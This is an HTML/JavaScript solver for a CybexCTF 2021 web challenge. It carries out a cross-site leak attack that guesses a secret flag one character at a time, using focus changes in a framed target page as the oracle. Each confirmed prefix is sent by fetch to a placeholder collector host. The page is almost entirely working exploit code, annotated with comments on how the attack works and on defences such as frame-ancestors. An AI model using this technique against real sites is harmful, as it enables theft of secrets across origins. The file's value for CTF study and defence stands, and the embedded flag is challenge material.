CybexCTF 2021’s WaloW3b solver.
Código fuente: github.
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<script>
// Solver for a cross-site leak: the page guesses the flag one character at a
// time and uses a focus change in the probing window as a yes/no oracle.
// The same file runs in two roles, selected by whether the URL has a query
// string: the coordinator (no query) and a short-lived probe window (?foo).
//
// Defensive reading: the oracle needs the target page to be frameable from
// another origin and to behave differently per guess. Refusing cross-origin
// framing (CSP frame-ancestors / X-Frame-Options) on the target removes the
// signal used here. On the server side this shows up as a rapid run of
// /walomsg requests whose flag parameter differs only in its last character.

// Origin of the challenge application that gets framed.
const localURL = "https://127.0.0.1:4000"
// Placeholder for the collector that receives each confirmed prefix.
const remoteURL = "https://your.server"
// Candidate characters tried at each position.
const alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"!¡¿?&%'(),-/:;<=>@[\\]_`{}~".split("");
// Prefix confirmed so far. The value here already ends with "}", so it is
// presumably the recovered flag pasted back in after the run — TODO confirm.
let known = "CYBEX{¡wAlO_`L0v3S`_¿f0cUs?&Sam3SiT3!}";
// Index into alphabet of the next character to try.
let iterator = 0;
// Probe role: any non-empty query string selects this branch.
if (location.search.substr(1)) {
// NOTE(review): neither message handler checks event.origin and every reply
// uses targetOrigin "*", so any window holding a reference can drive or read
// this exchange.
window.addEventListener("message", (event) => {
const frame = document.createElement('iframe');
// event.data is the candidate prefix sent by the coordinator. The #msg fragment
// presumably names an element that the target only focuses or renders when the
// guess matches — not visible from this file, verify against the challenge.
frame.src = `${localURL}/walomsg?flag=${encodeURIComponent(event.data)}&msg=foo#msg`;
frame.onload = function () {
// Wait 500 ms after load so a focus change inside the frame can settle.
setTimeout(() => {
// activeElement stops being <body> once focus has moved to the iframe.
if (document.activeElement != document.body) {
// Focus moved: report the candidate back as confirmed.
event.source.postMessage(event.data, "*");
} else {
// No focus change: tell the coordinator to discard this window.
event.source.postMessage("justCloseMe", "*");
}
}, 500);
}
document.body.appendChild(frame);
});
} else {
// Coordinator role: collects results from probe windows.
window.addEventListener("message", (event) => {
if (event.data != "justCloseMe") {
// A probe confirmed its candidate; adopt it as the new known prefix and
// send it to the collector. The fetch result is not awaited or checked.
known = event.data;
fetch(`${remoteURL}/FLAG/${encodeURIComponent(known)}`)
}
// The probe window is closed whatever it reported.
event.source.close();
});
// Every 50 ms, open a fresh probe window for the next candidate character.
setInterval(function () {
let char = alphabet[iterator];
console.log(`Testing ${known}(${char})`);
// The "?foo" suffix is what puts the new window into the probe role.
let win = window.open(`${location.href}?foo`, "_blank");
win.addEventListener("load", function () {
// Hand the probe its candidate: confirmed prefix plus one more character.
win.postMessage(`${known + char}`, "*");
})
// Advance through the alphabet, wrapping to the start after the last entry.
if (iterator == alphabet.length - 1) {
iterator = 0;
} else {
++iterator;
}
}, 50);
}
</script>
</body>
</html>